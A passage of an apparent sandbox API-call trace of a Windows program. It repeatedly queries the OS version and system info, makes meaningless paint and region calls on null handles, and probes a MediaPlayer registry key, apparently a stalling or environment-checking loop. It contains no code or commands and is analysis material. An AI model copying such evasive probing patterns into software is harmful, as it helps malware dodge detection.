dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.272] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.272] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.272] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.272] BeginPath (hdc=0x0) returned 0 [0089.272] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.272] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.272] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.272] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.272] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.272] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.272] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.272] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.272] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7d0401dc [0089.272] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7f0401d9 [0089.272] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104560c [0089.272] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104560d [0089.272] CombineRgn (hrgnDst=0x104560c, hrgnSrc1=0x7d0401dc, hrgnSrc2=0x7f0401d9, iMode=1) returned 1 [0089.272] CombineRgn (hrgnDst=0x104560d, hrgnSrc1=0x7d0401dc, hrgnSrc2=0x7f0401d9, iMode=4) returned 2 [0089.272] CreateSolidBrush (color=0xff) returned 0x210560b [0089.273] CreateSolidBrush (color=0xff0000) returned 0x110560e [0089.273] DeleteObject (ho=0x110560e) returned 1 [0089.273] DeleteObject (ho=0x7f0401d9) returned 1 [0089.273] DeleteObject (ho=0x7d0401dc) returned 1 [0089.273] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.273] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.273] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.273] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.273] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.273] BeginPath (hdc=0x0) returned 0 [0089.273] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.273] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.273] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.273] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.273] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.273] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.273] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.273] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.273] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x800401d9 [0089.273] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7e0401dc [0089.273] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104560f [0089.273] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045610 [0089.273] CombineRgn (hrgnDst=0x104560f, hrgnSrc1=0x800401d9, hrgnSrc2=0x7e0401dc, iMode=1) returned 1 [0089.273] CombineRgn (hrgnDst=0x1045610, hrgnSrc1=0x800401d9, hrgnSrc2=0x7e0401dc, iMode=4) returned 2 [0089.273] CreateSolidBrush (color=0xff) returned 0x210560e [0089.273] CreateSolidBrush (color=0xff0000) returned 0x1105611 [0089.273] DeleteObject (ho=0x1105611) returned 1 [0089.273] DeleteObject (ho=0x7e0401dc) returned 1 [0089.273] DeleteObject (ho=0x800401d9) returned 1 [0089.273] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.273] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.273] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.274] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.274] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.274] BeginPath (hdc=0x0) returned 0 [0089.274] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.274] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.274] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.274] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.274] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.274] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.274] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.274] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.274] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7f0401dc [0089.274] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x810401d9 [0089.274] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045612 [0089.274] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045613 [0089.274] CombineRgn (hrgnDst=0x1045612, hrgnSrc1=0x7f0401dc, hrgnSrc2=0x810401d9, iMode=1) returned 1 [0089.274] CombineRgn (hrgnDst=0x1045613, hrgnSrc1=0x7f0401dc, hrgnSrc2=0x810401d9, iMode=4) returned 2 [0089.274] CreateSolidBrush (color=0xff) returned 0x2105611 [0089.274] CreateSolidBrush (color=0xff0000) returned 0x1105614 [0089.274] DeleteObject (ho=0x1105614) returned 1 [0089.274] DeleteObject (ho=0x810401d9) returned 1 [0089.274] DeleteObject (ho=0x7f0401dc) returned 1 [0089.274] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.274] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.274] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.274] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.274] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.274] BeginPath (hdc=0x0) returned 0 [0089.274] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.274] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.275] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.275] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.275] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.275] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.275] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.275] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.275] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x820401d9 [0089.275] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x800401dc [0089.275] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045615 [0089.275] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045616 [0089.275] CombineRgn (hrgnDst=0x1045615, hrgnSrc1=0x820401d9, hrgnSrc2=0x800401dc, iMode=1) returned 1 [0089.275] CombineRgn (hrgnDst=0x1045616, hrgnSrc1=0x820401d9, hrgnSrc2=0x800401dc, iMode=4) returned 2 [0089.275] CreateSolidBrush (color=0xff) returned 0x2105614 [0089.275] CreateSolidBrush (color=0xff0000) returned 0x1105617 [0089.275] DeleteObject (ho=0x1105617) returned 1 [0089.275] DeleteObject (ho=0x800401dc) returned 1 [0089.275] DeleteObject (ho=0x820401d9) returned 1 [0089.275] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.275] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.275] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.275] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.275] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.275] BeginPath (hdc=0x0) returned 0 [0089.275] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.275] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.275] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.275] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.275] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.275] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.276] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.276] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.276] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x810401dc [0089.276] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x830401d9 [0089.276] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045618 [0089.276] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045619 [0089.276] CombineRgn (hrgnDst=0x1045618, hrgnSrc1=0x810401dc, hrgnSrc2=0x830401d9, iMode=1) returned 1 [0089.276] CombineRgn (hrgnDst=0x1045619, hrgnSrc1=0x810401dc, hrgnSrc2=0x830401d9, iMode=4) returned 2 [0089.276] CreateSolidBrush (color=0xff) returned 0x2105617 [0089.276] CreateSolidBrush (color=0xff0000) returned 0x110561a [0089.276] DeleteObject (ho=0x110561a) returned 1 [0089.276] DeleteObject (ho=0x830401d9) returned 1 [0089.276] DeleteObject (ho=0x810401dc) returned 1 [0089.276] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.276] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.276] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.276] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.276] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.276] BeginPath (hdc=0x0) returned 0 [0089.276] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.276] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.276] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.276] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.276] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.276] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.276] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.277] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.277] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x840401d9 [0089.277] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x820401dc [0089.277] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104561b [0089.277] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104561c [0089.277] CombineRgn (hrgnDst=0x104561b, hrgnSrc1=0x840401d9, hrgnSrc2=0x820401dc, iMode=1) returned 1 [0089.277] CombineRgn (hrgnDst=0x104561c, hrgnSrc1=0x840401d9, hrgnSrc2=0x820401dc, iMode=4) returned 2 [0089.277] CreateSolidBrush (color=0xff) returned 0x210561a [0089.277] CreateSolidBrush (color=0xff0000) returned 0x110561d [0089.277] DeleteObject (ho=0x110561d) returned 1 [0089.277] DeleteObject (ho=0x820401dc) returned 1 [0089.277] DeleteObject (ho=0x840401d9) returned 1 [0089.277] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.277] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.277] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.277] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.277] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.277] BeginPath (hdc=0x0) returned 0 [0089.277] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.277] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.277] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.277] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.277] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.277] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.277] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.277] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.463] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x830401dc [0089.463] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x850401d9 [0089.463] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x4045620 [0089.463] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xa040252 [0089.463] CombineRgn (hrgnDst=0x4045620, hrgnSrc1=0x830401dc, hrgnSrc2=0x850401d9, iMode=1) returned 1 [0089.463] CombineRgn (hrgnDst=0xa040252, hrgnSrc1=0x830401dc, hrgnSrc2=0x850401d9, iMode=4) returned 2 [0089.463] CreateSolidBrush (color=0xff) returned 0x210561d [0089.463] CreateSolidBrush (color=0xff0000) returned 0x410561f [0089.463] DeleteObject (ho=0x410561f) returned 1 [0089.463] DeleteObject (ho=0x850401d9) returned 1 [0089.463] DeleteObject (ho=0x830401dc) returned 1 [0089.463] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.463] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.463] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.463] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.463] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.463] BeginPath (hdc=0x0) returned 0 [0089.463] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.463] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.463] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.463] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.463] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.463] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.463] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.463] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.463] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x860401d9 [0089.464] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x840401dc [0089.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2045621 [0089.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045622 [0089.464] CombineRgn (hrgnDst=0x2045621, hrgnSrc1=0x860401d9, hrgnSrc2=0x840401dc, iMode=1) returned 1 [0089.464] CombineRgn (hrgnDst=0x1045622, hrgnSrc1=0x860401d9, hrgnSrc2=0x840401dc, iMode=4) returned 2 [0089.464] CreateSolidBrush (color=0xff) returned 0x510561f [0089.464] CreateSolidBrush (color=0xff0000) returned 0x1105623 [0089.464] DeleteObject (ho=0x1105623) returned 1 [0089.464] DeleteObject (ho=0x840401dc) returned 1 [0089.464] DeleteObject (ho=0x860401d9) returned 1 [0089.464] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.464] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.464] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.464] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.464] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.464] BeginPath (hdc=0x0) returned 0 [0089.464] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.464] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.464] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.464] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.464] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.464] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.464] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.464] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.464] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x850401dc [0089.464] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x870401d9 [0089.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045624 [0089.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045625 [0089.464] CombineRgn (hrgnDst=0x1045624, hrgnSrc1=0x850401dc, hrgnSrc2=0x870401d9, iMode=1) returned 1 [0089.464] CombineRgn (hrgnDst=0x1045625, hrgnSrc1=0x850401dc, hrgnSrc2=0x870401d9, iMode=4) returned 2 [0089.464] CreateSolidBrush (color=0xff) returned 0x2105623 [0089.464] CreateSolidBrush (color=0xff0000) returned 0x1105626 [0089.464] DeleteObject (ho=0x1105626) returned 1 [0089.464] DeleteObject (ho=0x870401d9) returned 1 [0089.464] DeleteObject (ho=0x850401dc) returned 1 [0089.464] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.464] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.465] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.465] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.465] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.465] BeginPath (hdc=0x0) returned 0 [0089.465] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.465] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.465] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.465] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.465] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.465] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.465] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.465] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", 